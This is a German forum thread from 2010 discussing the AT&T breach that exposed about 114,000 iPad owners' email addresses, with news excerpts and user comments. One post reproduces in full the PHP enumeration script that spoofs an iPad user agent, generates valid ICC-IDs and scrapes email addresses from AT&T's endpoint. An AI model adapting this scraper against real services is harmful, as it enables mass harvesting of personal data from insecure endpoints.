#1 10. Juni 2010 Durch eine Sicherheitslücke auf den Servern des amerikanischen Mobilfunkbetreibers AT&T gelang es Hackern, die eMail-Adressen von 114.000 iPad Kunden zu erhalten. Darunter befinden sich auch hochrangigen Vertreter aus Militär, Wirtschaft, Politik und den Medien. Der Angriff wurde von einer Gruppe durchgeführt, die sich selbst Goatse Security nennt. Diese hatte bereits Lücken in Firefox und Safari aufgedeckt und auch bei Amazon fand man Lücken im Bewertungssystem. Die eMail-Adressen wurden über ein Script auf der Website des Anbieters AT&T durchgeführt. Dort befand sich eine Seite die nach Eingabe der iPad 3G SIM Adresse (ICC-ID) die mit der Nummer verknüpfte Mail-Adresse ausgab. Das Skript gab die Daten aber auch zurück, wenn ein HTTP-Request mit angehängter ICC-ID ankam. Diese Möglichkeit nutzen die Hacker aus und über ein php-Skript automatisierte man den Vorgang. Die verwendeten Nummern wurden dabei einfach gehalten, was sich als sehr effektive Methode erwies. Insgesamt konnte man so 114000 Adressen sammeln. Dies sind jedoch nur die Adressen, die von Goatse Security gesammelt wurden. Da man das php-Script auch an Dritte weitergegeben habe, kann die Zahl auch noch deutlich höher ausfallen. Zu den betroffenen Accounts gehören hochrangige Vertreter aus den Medien, Politik und auch Militär. So finden sich unter den Adressen z.B. Janet Robinson (CEO New York Times), Diane Sawyer (ABC News), Harvey Weinstein oder auch Bürgermeister Michael Bloomberg. Sogar bis ins Weiße Haus hat man es geschafft und die Adresse von Rahm Emanuel (Chief of Staff) bekommen. Die Daten könnten nun entsprechend verkauft und für eMail-Spam oder auch Hacking-Angriffe verwendet werden. Der zweite Punkt scheint jedoch zurzeit nicht relevant zu sein. So geht nach Emmanuel Gadaix, Mobile Security Consultant, keine Gefahr durch die offengelegten ICC-IDs aus. Bisher gäbe es keine Lücken oder Schwachstellen, die auf der ICC-ID basierten. Auch Karsten Nohl, "white hat GSM Hacker" von der Universität von Virgina, bestätigte dies. Da die Daten-Verbindungen sehr gut verschlüsselt seien, gäbe es keine direkten sicherheitsrelevanten Konsequenzen. Die entsprechende Lücke wurde bereits von AT&T geschlossen, jedoch hat man es bis jetzt versäumt, die betroffenen Kunden zu informieren. Viele dürften erst durch den Bericht von Gawker auf den Hack aufmerksam geworden sein. Und auch Apple dürfte durch den Vorfall betroffen sein. Da AT&T in den USA der einzige Anbieter von Datentarife für das iPad 3G ist, sind alle Kunden gezwungen, ihre Adressen in die Obhut des Providers zu geben. Aus diesem Grund wollte bzw. sollte man auf Seiten Apples auch die sicherheitsrelevanten Vorkehrungen auf Seiten der Partner überprüfen. Bei AT&T gab man mittlerweile auch ein Statement ab. Man habe den Vorfall an die höchsten Stellen im Unternehmen eskaliert und die Lücke am Dienstag geschlossen. Man werde die Sache nun weiter untersuchen und die betroffenen Kunden informieren. Quelle: Apples Worst Security Breach: 114,000 iPad Owners Exposed + Multi-Zitat Zitieren
#2 10. Juni 2010 AW: AT&T - Hacker stehlen eMail-Adressen von iPad-Kunden Das Script hätte ich gern mal gesehen..... + Multi-Zitat Zitieren
#3 10. Juni 2010 AW: AT&T - Hacker stehlen eMail-Adressen von iPad-Kunden und jetzt schön die ganzen ipad nutzer zuspammen nice, dass sich das ganze primär auf apple besitzer bezieht ... aber so werden andere länder nun vielleicht vorsorgen, falls nötig, um diese lücke zu beseitigen. + Multi-Zitat Zitieren
#4 10. Juni 2010 AW: AT&T - Hacker stehlen eMail-Adressen von iPad-Kunden Die Crew muss nicht schlecht drauf sein! So ne Attacke muss nicht immer Nachteile mit sich ziehen! Die aufgedeckte Sicherheitslücke können andere schließen -> einer muss halt dran glauben ^^ MFG + Multi-Zitat Zitieren
#5 10. Juni 2010 AW: AT&T - Hacker stehlen eMail-Adressen von iPad-Kunden Spoiler PHP: <? php // iPad 3G Account Slurper // // Usage: ./ipadump.php ICCID-base count // (The script generates the final checkdigit to produce ICCIDs from the entered base) $useragent = "Mozilla/5.0 (iPad)" ; //Spoof as iPad $ICCIDroot = $_SERVER [ 'argv' ][ 1 ]; $ICCIDcount = $_SERVER [ 'argv' ][ 2 ]; function genluhn ( $number ){ //Crappy home-made Luhn checkdigit generator $i = strlen ( $number )- 1 ; do { $array [] = $number [ $i ]; $i --; } while ( $i > - 1 ); $i = 0 ; foreach ( $array as $digit ) { if (!( $i & 1 )){ $digit = $digit * 2 ; if ( $digit >= 10 ) { $digit = $digit - 9 ; } } $total += $digit ; $i ++; } $luhn = 10 - ( $total % 10 ); if ( $luhn == 10 ) $luhn = 0 ; return $luhn ; } while ( 1 ) { //Continue FOREVER $ch = curl_init (); //Set up cURL curl_setopt ( $ch , CURLOPT_USERAGENT , $useragent ); curl_setopt ( $ch , CURLOPT_FOLLOWLOCATION , 1 ); //Since theres a lot of redirection curl_setopt ( $ch , CURLOPT_COOKIEJAR , "cookies" ); //See later curl_setopt ( $ch , CURLOPT_RETURNTRANSFER , 1 ); //Returns any and all data $ICCID = $ICCIDroot . genluhn ( strval ( $ICCIDroot )); //Generate checkdigit and attach it to the ICCID curl_setopt ( $ch , CURLOPT_URL , "https://dcp2.att.com/OEPClient/openPage?ICCID=" . strval ( $ICCID ). "&IMEI=0" ); $output = curl_exec ( $ch ); //Load first page with ICCID curl_setopt ( $ch , CURLOPT_URL , "https://dcp2.att.com/OEPClient/Customer" ); $output = curl_exec ( $ch ); //Now load page that is normally redirected with JavaScript. cURL is nice and passes the previously GET 'd info curl_close($ch); //print $output; //Prints HTML result if (!($counter % 50)) echo "-".strval($ICCID)."-\n"; //Prints ICCID every 50 counts just to keep track of how far the script has gotten //Parse output. Terribly sloppy if (preg_match("/<title>Error<\/title>/", $output, $match)) { preg_match("/<div class=\"info-container\">(.*)<br>(.*)<br>/msU", $output, $match); $match[0] = preg_replace("/<div class=\"info-container\">\n\s\s+/","",$match[0]); $match[0] = preg_replace("/<\/b><br>/", "<\/b> <br>", $match[0]); //Because I want space between the period and the next sentence, dammit $errnum = strip_tags($match[0]); $status = "Error! ".$errnum; //Return specific error message } else if (preg_match("<input id=\"email\" name=\"email\" type=\"email\" placeholder=\"Required\" value=\".*\@.*\" autocapitalization=\"off\" autocorrect=\"off\">", $output, $match)) { $match[0] = preg_replace("/input id=\"email\" name=\"email\" type=\"email\" placeholder=\"Required\" value=\"/","",$match[0]); $status = preg_replace("/\" autocapitalization=\"off\" autocorrect=\"off\"/", "", $match[0]); //Return email address } else { $status = "Inactive"; //Assume SIM is inactive if nothing tells us otherwise. Bad logic, will fix. } if ($status != "Inactive") echo strval($ICCID)." : ".$status."\n"; //Print ICCID with error message or email address. Can print if ICCID is inactive, but it makes for a long, redundant log. if ($counter == $ICCIDcount) exit; $ICCIDroot++; //step ICCID $counter++; //step loop counter } ?> + Multi-Zitat Zitieren
#6 10. Juni 2010 AW: AT&T - Hacker stehlen eMail-Adressen von iPad-Kunden Sicherheitslücken finden ist eher einfach, sie zu schliessen, da gehört schon was dazu, finde ich. + Multi-Zitat Zitieren
#7 11. Juni 2010 FBI ermittelt nach iPad-Datenpanne bei AT&T Die Datenpanne, bei der E-Mail-Adressen von rund 114.000 US-amerikanischen iPad-Besitzern offen zugänglich waren, wird ein Fall für das FBI. Die US-Bundespolizei nahm Ermittlungen auf, wie Sprecher der New York Times und dem Wall Street Journal am Donnerstagabend bestätigten. Eine Hacker-Gruppe hatte zuvor erklärt, sie sei durch eine Sicherheitslücke beim Telekom-Konzern AT&T relativ einfach an die Mail-Adressen von iPad-Nutzern mit einem Mobilfunk-Vertrag herangekommen. Brisant ist, dass darunter auch zahlreiche ranghohe US-Beamte waren, unter anderem aus dem Pentagon und dem Weißen Haus. AT&T hatte das Problem bestätigt und betont, dass die Lücke inzwischen geschlossen worden sei. Es seien keine weiteren Daten außer den E-Mail-Adressen einsehbar gewesen. iPad-Anbieter Apple äußerte sich bisher nicht. (dpa) / (anw) Quelle: heise.de --- Find ich schon heftig, dass es manchmal so einfach ist an Daten zu kommen. Auch wenn es "nur" E-Mail Adressen sind. Denkt Ihr, dass sich solche E-Mail Adressen verkaufen lassen oder eher weniger? Wie hoch wird wohl die Chance sein die Übeltäter zu finden? + Multi-Zitat Zitieren
#8 15. Juni 2010 AW: FBI ermittelt nach iPad-Datenpanne bei AT&T Die Adressen lassen sich sehr wohl verkaufen. Mehr als ne 5 Stellige Summe dürfte aber nicht drinne sein. Aber genau wenn man das macht ist die Chance sehr hoch erwishct zu werden. Ist ja sehr auffällig wenn genau diese 114k Menschen dann von einem Spammer Werbung bekommen + Multi-Zitat Zitieren
#9 15. Juni 2010 AW: AT&T - Hacker stehlen eMail-Adressen von iPad-Kunden also ich finds schon krass wie man einfach mal so 100000 emails bekommen kann. man sollte über die datensammlung von vielen anderen fimen auch noch mal überdenken wie leicht sinnig die bestimmt mit den daten umgehen und das so etwas sehr schnell passieren kann findet keiner den gruppen namen "goatse security" lustig außer ich XD???? ouhjeee edit // mein 1.337 beitrag ... den habe ich mir ganz anders vorgestellt :/ auman gleich 2 internet mythen aufeinmal jetzt hab ich das für immer in erinnerung wenn ich an raidrush meinen 1337beitrag denk und ich goatse vor augen hab XD + Multi-Zitat Zitieren
#10 15. Juni 2010 AW: AT&T - Hacker stehlen eMail-Adressen von iPad-Kunden meinst du das?^^ Goatse 2T joa kommt vor.^^ 114k mails mehr die zugespammt werden. mehr konsequenzen werden wohl nich entstehen für die kunden. vom imageschaden der firmen mal ganz abgesehen. + Multi-Zitat Zitieren
#11 15. Juni 2010 AW: AT&T - Hacker stehlen eMail-Adressen von iPad-Kunden Hi, was ich gehört habe, werden die Email Adressen nicht an dritte weiter verkauft. Dieser Angriff diente jedeglich um den Leuten Ihre mangelnte Sicherheit zu zeigen. MFG //Edit: Diebstahl von iPad-Nutzerdaten: FBI ermittelt wegen Datenpanne - SPIEGEL ONLINE + Multi-Zitat Zitieren
#12 15. Juni 2010 AW: AT&T - Hacker stehlen eMail-Adressen von iPad-Kunden Sie sagen aber auch sie haben das Skript weitergegeben, vielleicht haben sie ja das verkauft, mit der aussischt auf paar hundert k adressen? Aber ich will nichts unterstellen. Auf jeden Fall ne gute Arbeit von den Jungs diese Schwachstelle aufzuspüren und aufzuzeigen + Multi-Zitat Zitieren
#13 15. Juni 2010 AW: AT&T - Hacker stehlen eMail-Adressen von iPad-Kunden konzerne wie AT&T sind mir eh suspekt... wenn die hackertypen nicht selber immer damit rauskommen würden, würde das einfach verschwiegen werden... bzw. ich bin mir sicher, solche datenklau-pannen kommen viel viel öfter vor, und es fließt dann bestechungsgeld, damit die öffentlichkeit es nicht erfährt. + Multi-Zitat Zitieren